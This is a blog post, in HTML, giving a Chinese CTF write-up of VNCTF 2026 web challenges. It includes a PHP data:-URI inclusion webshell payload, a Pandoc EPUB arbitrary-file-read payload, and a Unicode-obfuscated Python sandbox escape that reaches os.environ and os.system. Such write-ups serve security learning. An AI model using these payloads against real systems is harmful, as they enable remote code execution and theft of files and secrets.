

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/myblog/img/1.png">
  <link rel="icon" href="/myblog/img/1.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#83C3DE">
  <meta name="author" content="Zomon">
  <meta name="keywords" content="Zomon">
  
    <meta name="description" content="前言​	这是我学web半年来打的第一场有关战队的比赛，只能说又开了眼界，被很多新的解题技巧迷得眼花缭乱，虽然差了个java反序列化没做出来，但还是很开心，毕竟这是我第一次打进前40名并且还是第一次解出难度为困难的题目（附一张解题照片）  Signin审视源码发现过滤了[‘&#x2F;‘, ‘convert’, ‘base’, ‘text’, ‘plain’] 由GET体file传参进行文件包含（当">
<meta property="og:type" content="article">
<meta property="og:title" content="VNCTF 2026-web(部分无java)">
<meta property="og:url" content="https://zomonp.github.io/myblog/2026/02/14/VNCTF-2026/index.html">
<meta property="og:site_name" content="Zomon&#39;s Blog">
<meta property="og:description" content="前言​	这是我学web半年来打的第一场有关战队的比赛，只能说又开了眼界，被很多新的解题技巧迷得眼花缭乱，虽然差了个java反序列化没做出来，但还是很开心，毕竟这是我第一次打进前40名并且还是第一次解出难度为困难的题目（附一张解题照片）  Signin审视源码发现过滤了[‘&#x2F;‘, ‘convert’, ‘base’, ‘text’, ‘plain’] 由GET体file传参进行文件包含（当">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://zomonp.github.io/myblog/img/VNCTF_2026/11.png">
<meta property="og:image" content="https://zomonp.github.io/myblog/img/VNCTF_2026/1.png">
<meta property="og:image" content="https://zomonp.github.io/myblog/img/VNCTF_2026/2.png">
<meta property="og:image" content="https://zomonp.github.io/myblog/img/VNCTF_2026/3.png">
<meta property="og:image" content="https://zomonp.github.io/myblog/img/VNCTF_2026/4.png">
<meta property="og:image" content="https://zomonp.github.io/myblog/img/VNCTF_2026/5.png">
<meta property="og:image" content="https://zomonp.github.io/myblog/img/VNCTF_2026/6.png">
<meta property="og:image" content="https://zomonp.github.io/myblog/img/VNCTF_2026/7.png">
<meta property="og:image" content="https://zomonp.github.io/myblog/img/VNCTF_2026/8.png">
<meta property="og:image" content="https://zomonp.github.io/myblog/img/VNCTF_2026/9.png">
<meta property="og:image" content="https://zomonp.github.io/myblog/img/VNCTF_2026/10.png">
<meta property="article:published_time" content="2026-02-14T12:13:17.000Z">
<meta property="article:modified_time" content="2026-02-14T12:16:54.063Z">
<meta property="article:author" content="Zomon">
<meta property="article:tag" content="比赛wp&#x2F;赛后总结">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://zomonp.github.io/myblog/img/VNCTF_2026/11.png">
  
  
    <meta name="referrer" content="no-referrer-when-downgrade">
  
  
  <title>VNCTF 2026-web(部分无java) - Zomon&#39;s Blog</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/myblog/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/myblog/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/myblog/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"zomonp.github.io","root":"/myblog/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":"flase","loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"busuanzi":{"enable":true,"site_uv":true,"site_pv":true,"page_pv":true},"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/myblog/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/myblog/js/utils.js" ></script>
  <script  src="/myblog/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 8.1.1"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/myblog/">
      <strong>Zomon&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/myblog/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/myblog/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/myblog/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/myblog/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/myblog/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/myblog/img/1.jpeg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="VNCTF 2026-web(部分无java)"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2026-02-14 20:13" pubdate>
          2026年2月14日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          26 分钟
        
      </span>
    

    
    
      
        <span id="busuanzi_container_page_pv" style="display: none">
          <i class="iconfont icon-eye" aria-hidden="true"></i>
          <span id="busuanzi_value_page_pv"></span> 次
        </span>
        

      
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">VNCTF 2026-web(部分无java)</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>​	这是我学web半年来打的第一场有关战队的比赛，只能说又开了眼界，被很多新的解题技巧迷得眼花缭乱，虽然差了个java反序列化没做出来，但还是很开心，毕竟这是我第一次打进前40名并且还是第一次解出难度为困难的题目（附一张解题照片）</p>
<p><img src="/myblog/img/VNCTF_2026/11.png" srcset="/myblog/img/loading.gif" lazyload alt="图片描述"></p>
<h1 id="Signin"><a href="#Signin" class="headerlink" title="Signin"></a><strong>Signin</strong></h1><p>审视源码发现过滤了[‘&#x2F;‘, ‘convert’, ‘base’, ‘text’, ‘plain’]</p>
<p>由GET体file传参进行文件包含（当file长度小等于20时）</p>
<p>于是便可以用data协议进行文件上传包含，但是&#x2F;&#x2F;被ban，所以可以用短符号简写绕过：data;,<br> 然后，由于include具有解析上传文件的特性，能把上传的文件当作php代码识别，故可以写出以下payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">?file=data:,<span class="hljs-meta">&lt;?php</span>info();<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p><img src="/myblog/img/VNCTF_2026/1.png" srcset="/myblog/img/loading.gif" lazyload alt="图片描述"></p>
<p>phpinfo显示short_open_tag&#x3D;On，所以可以用短标签减少字数</p>
<p>随后就可以构建一句话了</p>
<p>原本是&lt;?&#x3D;eval($_GET[x]);这样的，但是长度超20了</p>
<p>于是上网搜得反引号是 shell_exec() 的语法糖</p>
<p>即<code>$_GET[0]</code> &#x3D;&#x3D;&#x3D; shell_exec($_GET[0])</p>
<p>（题目不支持POST传参）</p>
<p>所以构得最后payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">?file=data:,<span class="hljs-meta">&lt;?=</span>`<span class="hljs-variable">$_GET</span>[x]`;&amp;x=cat /flag<br></code></pre></td></tr></table></figure>

<p>得到flag</p>
<p><img src="/myblog/img/VNCTF_2026/2.png" srcset="/myblog/img/loading.gif" lazyload alt="图片描述"></p>
<h1 id="渗透测试"><a href="#渗透测试" class="headerlink" title="渗透测试"></a><strong>渗透测试</strong></h1><p>题目是一个登录框，给了一个密码附件，很明显是要去爆破密码，一共两万个密码（）</p>
<p>Burp suite抓包发现上传的参数被加密了，所以直接用intruder爆破肯定不现实，所以便然ai写了个模拟键盘输入的键盘宏的python脚本一个个爆破密码，用户名admin</p>
<p>最后跑了一个晚上跑出来了（分多个虚拟机同时跑），密码是5V26s9dBZQVBZgyyVC00baeW</p>
<p><img src="/myblog/img/VNCTF_2026/3.png" srcset="/myblog/img/loading.gif" lazyload alt="图片描述"></p>
<h1 id="Markdown2world"><a href="#Markdown2world" class="headerlink" title="Markdown2world"></a><strong>Markdown2world</strong></h1><p>首先试了一下上传别的后缀文件，提示只能上传.md或.markdown后缀的文件，于是只能在Pandoc机制，转换机制，和不同类型文件的特性中研究</p>
<p>题目提示了</p>
<p><img src="/myblog/img/VNCTF_2026/4.png" srcset="/myblog/img/loading.gif" lazyload alt="图片描述"></p>
<p>于是只能上网搜一下这几种文件都有哪些可能的漏洞</p>
<p>发现可以试试tamplate模板注入，于是构造payload：</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli"> \<span class="hljs-params">---</span><br><br>template: <span class="hljs-string">/flag</span><br><br>\<span class="hljs-params">---</span><br><br> <br><br>xxxxxxxxx（一定要写）<br></code></pre></td></tr></table></figure>

<p>上传，发现被拦截了</p>
<p>template和reference-doc被过滤，pdf文件有上传不了，只能试试通过资源文件引用+EPUB打包机制 进行任意文件读取，或者通过文件名注入命令了</p>
<p>首先是看了上传后文件名会被重新修改，于是随便上传了一个名为<?phpinfo();?>.md的文件。但是没用</p>
<p>那就只能试试Pandoc的特性:<br> Pandoc生成EPUB时，有一个特性叫 “Resource Fetching”（资源抓取），只要通过构造特殊的资源抓取语句来改变EPUB抓取的资源的路径即可达到类似于“文件包含”的效果，将flag打包下载下来</p>
<p>Payload（可以多设几条路径提高拿到flag的概率）：</p>
<figure class="highlight lua"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs lua"> \<span class="hljs-comment">---</span><br><br>resource-<span class="hljs-built_in">path</span>: [<span class="hljs-string">&quot;/&quot;</span>, <span class="hljs-string">&quot;/tmp&quot;</span>, <span class="hljs-string">&quot;/home/ctf&quot;</span>, <span class="hljs-string">&quot;.&quot;</span>]<br><br>\<span class="hljs-comment">---</span><br><br> <br><br>![flag](/flag)<br></code></pre></td></tr></table></figure>

<p> 下载下来后可以改后缀为.zip来解压</p>
<p>在解压包中拿到flag：</p>
<p><img src="/myblog/img/VNCTF_2026/5.png" srcset="/myblog/img/loading.gif" lazyload alt="图片描述"></p>
<p><img src="/myblog/img/VNCTF_2026/6.png" srcset="/myblog/img/loading.gif" lazyload alt="图片描述"></p>
<h1 id="I-really-really-really"><a href="#I-really-really-really" class="headerlink" title="I really really really"></a><strong>I really really really</strong></h1><p>看到题目发现考的是python沙箱逃逸（慌了），只能现学现卖了()</p>
<p>先进行简单的fuzz测试，发现常规的’ “ [ ] { } __ ;和数字0-9都被过滤了，hint提及unicode，于是就去搜寻这些字符有关的unicode编码其他格式（查了超多资料，这里只写了有用的编码）<br> 发现单引号: ʼ [U+02BC]修饰符右单引号<br> 没被过滤</p>
<p>发现_没被过滤</p>
<p>就想着引入模块去做，结果发现几乎全部的模块都被删了（应该是所有的）</p>
<p>首先先要解决__的问题，这里用了fuzz测试了多种组合：_̲ ﹍﹎ ﹏﹍ ⁔﹍ ﹋﹌等等等一大把</p>
<p>最后发现只有_̲ 和 ﹎_没被过滤，本来以为_̲ 可以，结果不知道为啥系统自动识别成了普通字符</p>
<p><img src="/myblog/img/VNCTF_2026/7.png" srcset="/myblog/img/loading.gif" lazyload alt="图片描述"></p>
<p><img src="/myblog/img/VNCTF_2026/8.png" srcset="/myblog/img/loading.gif" lazyload alt="图片描述"></p>
<p>随后就是关键字的问题，本来想着用ʼ claʼ +ʼss ʼ的方法绕过的，但是失败了，但是后来看到题目的字体后才发觉可以试试数学花体字母𝓬𝓵𝓪𝓼𝓼，于是就成功了</p>
<p>等基本的完工后就运用一点ssti的知识读取flag</p>
<p>但是不知道为啥始终返回空白</p>
<p>等后面群里师傅说在环境变量里也有flag才找到另一条生路</p>
<p>首先鉴于单行字符不能超过30，所以采用拼接的方式串联起payload：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs python">a=()<br><br>b=a._﹍𝓬𝓵𝓪𝓼𝓼﹍_<br><br>c=b._﹍𝓫𝓪𝓼𝓮﹍_<br><br>d=c._﹍𝓼𝓾𝓫𝓬𝓵𝓪𝓼𝓼𝓮𝓼﹍_()<br><br><span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> d:<br><br> <span class="hljs-keyword">try</span>:<br><br> g=x._﹍𝓲𝓷𝓲𝓽﹍_._﹍𝓰𝓵𝓸𝓫𝓪𝓵𝓼﹍_<br><br><span class="hljs-keyword">except</span>:<span class="hljs-keyword">pass</span><br></code></pre></td></tr></table></figure>

<p>随后就是通过报错</p>
<p>（触发AssertionError: &lt;r的内容&gt;，**错误信息一定会显示在网页回显中）**读取environ字典了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><code class="hljs python">a=()<br><br>b=a._﹍𝓬𝓵𝓪𝓼𝓼﹍_<br><br>c=b._﹍𝓫𝓪𝓼𝓮﹍_<br><br>d=c._﹍𝓼𝓾𝓫𝓬𝓵𝓪𝓼𝓼𝓮𝓼﹍_()<br><br>r=()<br><br><span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> d:<br><br> <span class="hljs-keyword">try</span>:<br><br> g=x._﹍𝓲𝓷𝓲𝓽﹍_._﹍𝓰𝓵𝓸𝓫𝓪𝓵𝓼﹍_<br><br> e=g.get(k).environ<br><br> r=e<br><br> <span class="hljs-keyword">except</span>:<span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">assert</span> ...!=...,r<br></code></pre></td></tr></table></figure>

<p>但是这个回显是</p>
<p><img src="/myblog/img/VNCTF_2026/9.png" srcset="/myblog/img/loading.gif" lazyload alt="图片描述"></p>
<p>跟ai探讨了一个小时左右，发现原来不是模块被删了，而是放到别的模块去了（应该是的），所以只能利用一个try&#x2F;expect循环遍历__init__.__globals__找到包含os模块的globals</p>
<p>最后生成的payload如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><code class="hljs python">a=()<br><br>b=a._﹍𝓬𝓵𝓪𝓼𝓼﹍_<br><br>c=b._﹍𝓫𝓪𝓼𝓮﹍_<br><br>d=c._﹍𝓼𝓾𝓫𝓬𝓵𝓪𝓼𝓼𝓮𝓼﹍_()<br><br>r=()<br><br><span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> d:<br><br> <span class="hljs-keyword">try</span>:<br><br> g=x._﹍𝓲𝓷𝓲𝓽﹍_._﹍𝓰𝓵𝓸𝓫𝓪𝓵𝓼﹍_<br><br> <span class="hljs-keyword">for</span> k <span class="hljs-keyword">in</span> g:<br><br>  <span class="hljs-keyword">try</span>:<br><br>  e=g.get(k).environ<br><br>  r=e<br><br>  <span class="hljs-keyword">except</span>:<span class="hljs-keyword">pass</span><br><br> <span class="hljs-keyword">except</span>:<span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">assert</span> ...!=...,r<br></code></pre></td></tr></table></figure>

<p>在环境变量中找到flag：<br> <img src="/myblog/img/VNCTF_2026/10.png" srcset="/myblog/img/loading.gif" lazyload alt="图片描述"></p>
<p>其实我本来是想把flag导入到同目录的文件中的</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><code class="hljs python">a=()<br><br>b=a._﹍𝓬𝓵𝓪𝓼𝓼﹍_<br><br>c=b._﹍𝓫𝓪𝓼𝓮﹍_<br><br>d=c._﹍𝓼𝓾𝓫𝓬𝓵𝓪𝓼𝓼𝓮𝓼﹍_()<br><br>r=()<br><br><span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> d:<br><br> <span class="hljs-keyword">try</span>:<br><br> g=x._﹍𝓲𝓷𝓲𝓽﹍_._﹍𝓰𝓵𝓸𝓫𝓪𝓵𝓼﹍_<br><br> h=g.get(ʼosʼ)<br><br> h.system(ʼcat /flag&gt;/tmp/aʼ)<br><br> <span class="hljs-keyword">except</span>:<br><br> <span class="hljs-keyword">pass</span><br><br><span class="hljs-keyword">assert</span> ...!=...,r<br></code></pre></td></tr></table></figure>

<p>但是代码太长了，导致不能实现</p>
<h1 id="赛后总结"><a href="#赛后总结" class="headerlink" title="赛后总结"></a>赛后总结</h1><p>​	这是一次体验很好的比赛，让我意识到自己有多么渺小，有多么浅陋。果然人还是得经历一些事才能明白一些人生道理（哈哈），但愿在2026年能做的更好吧！</p>

                
              </div>
            
            <hr/>
            <div>
              <div class="post-metas my-3">
  
    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/myblog/categories/web%E4%B8%8E%E6%88%91%E7%9A%84%E6%97%85/" class="category-chain-item">web与我的旅</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/myblog/tags/%E6%AF%94%E8%B5%9Bwp-%E8%B5%9B%E5%90%8E%E6%80%BB%E7%BB%93/" class="print-no-link">#比赛wp/赛后总结</a>
      
    </div>
  
</div>


              
  

  <div class="license-box my-3">
    <div class="license-title">
      <div>VNCTF 2026-web(部分无java)</div>
      <div>https://zomonp.github.io/myblog/2026/02/14/VNCTF-2026/</div>
    </div>
    <div class="license-meta">
      
        <div class="license-meta-item">
          <div>作者</div>
          <div>Zomon</div>
        </div>
      
      
        <div class="license-meta-item license-meta-date">
          <div>发布于</div>
          <div>2026年2月14日</div>
        </div>
      
      
      
        <div class="license-meta-item">
          <div>许可协议</div>
          <div>
            
              
              
                <a class="print-no-link" target="_blank" href="https://creativecommons.org/licenses/by/4.0/">
                  <span class="hint--top hint--rounded" aria-label="BY - 署名">
                    <i class="iconfont icon-cc-by"></i>
                  </span>
                </a>
              
            
          </div>
        </div>
      
    </div>
    <div class="license-icon iconfont"></div>
  </div>



              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/myblog/2025/11/09/Hello%20Guys!/" title="Hello Guys!">
                        <span class="hidden-mobile">Hello Guys!</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>目录</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> <a href="https://icp.gov.moe/?keyword=20267046" target="_blank">萌ICP备20267046号</a> 
    </div>
  
  
    <div class="statistics">
  
  

  
    
      <span id="busuanzi_container_site_pv" style="display: none">
        总访问量 
        <span id="busuanzi_value_site_pv"></span>
         次
      </span>
    
    
      <span id="busuanzi_container_site_uv" style="display: none">
        总访客数 
        <span id="busuanzi_value_site_uv"></span>
         人
      </span>
    
    

  

</div>

  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/myblog/js/events.js" ></script>
<script  src="/myblog/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/myblog/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


